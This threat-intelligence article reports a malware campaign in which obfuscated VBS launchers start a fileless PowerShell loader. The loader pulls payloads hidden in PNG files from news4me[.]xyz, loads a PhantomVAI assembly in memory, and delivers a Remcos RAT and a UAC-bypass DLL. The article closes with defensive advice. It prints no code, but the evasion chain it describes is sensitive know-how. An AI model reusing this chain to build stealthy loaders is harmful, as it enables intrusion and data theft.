A new, sophisticated malware campaign is targeting systems using a multi-stage approach involving obfuscated Visual Basic Script (VBS) files, PNG loaders, and remote access trojans (RATs), all designed for stealthy, disk-less execution. This campaign, initially noted in early 2026, has revealed a reusable delivery framework operating from shared infrastructure. The primary characteristic of this Open Directory Malware Campaign is its ability to deploy diverse malware payloads through separate attack chains without leaving traditional traces.
The campaign was first identified through a suspicious VBS file, named Name_File.vbs, detected in a user’s public download directory. While endpoint protection successfully quarantined the file, its heavily encoded content signaled a more organized threat than a simple opportunistic attack. Analysis revealed Base64-encoded PowerShell commands within the script, designed to fetch additional components from remote servers. Subsequent investigation by LevelBlue’s SpiderLabs Cyber Threat Intelligence team confirmed these suspicions, uncovering a distributed attack operation.
Unraveling the Open Directory Malware Campaign’s Infrastructure and Tactics
The investigation into the Open Directory Malware Campaign uncovered a network of attacker-controlled domains, primarily news4me[.]xyz, hosting multiple obfuscated VBS files within openly accessible directories. These included subdirectories like `/coupon/`, `/protector/`, and `/invoice/`, each serving a specific purpose in the attack chain: staging VBS launchers, hosting obfuscated payload files, or facilitating entirely separate infection vectors. This structure allows attackers to quickly update, rotate, or expand their hosted payloads without altering the core delivery logic, making the campaign resilient to detection and disruption.
The threat identified involves a reusable delivery framework capable of pushing different malware payloads. This infrastructure was not a static setup but a dynamic system allowing for rapid adaptation. Beyond the VBS-based attacks, evidence also indicated a separate infection chain linked to a deceptive PDF file, operating from the same infrastructure. This confirms the campaign’s deliberate and multi-vector approach, aiming to capitalize on various entry points.
Inside the Infection Mechanism: VBS to In-Memory RAT Execution
The initial stage of the infection leverages a VBS file that functions solely as a launcher, containing no inherently malicious code. This script is deeply obscured by layers of Unicode characters. Once these characters are stripped, the underlying VBS code is revealed as a Base64-encoded PowerShell command, which serves as the true engine of the attack. This PowerShell command is designed to operate as a fileless loader, enforcing TLS 1.2 protocols and utilizing the Net.WebClient class to retrieve content from remote locations.
Instead of downloading a conventional executable file, the loader fetches a PNG image file named MSI_PRO_with_b64.png. This image file, while appearing innocuous, contains encoded data concealed between specific markers, known as BaseStart and BaseEnd. This embedded assembly, identified as PhantomVAI, is loaded directly into the system’s memory using the Reflection.Assembly::Load method. This “in-memory” execution bypasses traditional file-based security controls, making it significantly harder for standard antivirus solutions to detect.
Once the PhantomVAI assembly is active in memory, it retrieves two URLs for subsequent execution. The first URL, news4me[.]xyz/protector/johnremcos.txt, contains an obfuscated string. Upon decoding, this string reveals a functional instance of the Remcos RAT, a popular remote access trojan. This payload grants the attackers persistent, remote control over the compromised machine, enabling them to exfiltrate data, deploy further malware, or conduct espionage. The second URL delivers a file named uac.png, another PNG image containing a DLL designed for User Account Control (UAC) bypass. This component silently escalates privileges, allowing the attackers to operate with elevated permissions without user interaction.
The combined effect of these payloads is to provide attackers with comprehensive control over a targeted system, all while leaving minimal traditional file artifacts on the disk. This advanced technique highlights the evolving sophistication of modern cyber threats. The campaign’s reliance on fileless malware and memory-resident payloads poses a significant challenge for traditional security measures. The use of domain generation algorithms and the ability to quickly rotate payloads suggest a well-resourced and adaptable adversary.
Organizations are advised to implement strict policies regarding the execution of VBS and BAT files from user-writable directories, such as UsersPublic. Additionally, enforcing constrained PowerShell policies with robust in-memory execution logging can provide crucial visibility. On the network level, blocking WebDAV-based connections and filtering traffic to and from `.xyz` top-level domains are recommended measures to obstruct access to the identified attacker infrastructure. Effective endpoint protection must be complemented by in-depth threat intelligence and proactive monitoring to detect and respond to such advanced, multi-vector attacks.